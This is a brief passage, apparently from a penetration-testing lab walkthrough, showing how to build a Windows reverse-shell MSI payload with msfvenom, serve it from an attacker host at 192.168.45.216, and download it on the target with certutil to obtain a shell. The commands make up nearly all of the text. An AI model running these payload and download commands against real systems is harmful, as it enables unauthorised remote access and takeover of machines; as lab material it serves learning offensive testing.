80

Now generating a payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.216 LPORT=445 -f msi > priv.msi

Now transfer this to the machine and run to get a reverse shell:

python3 -m uploadserver 80
certutil -urlcache -f http://192.168.45.216/priv.msi priv.msi

Last updated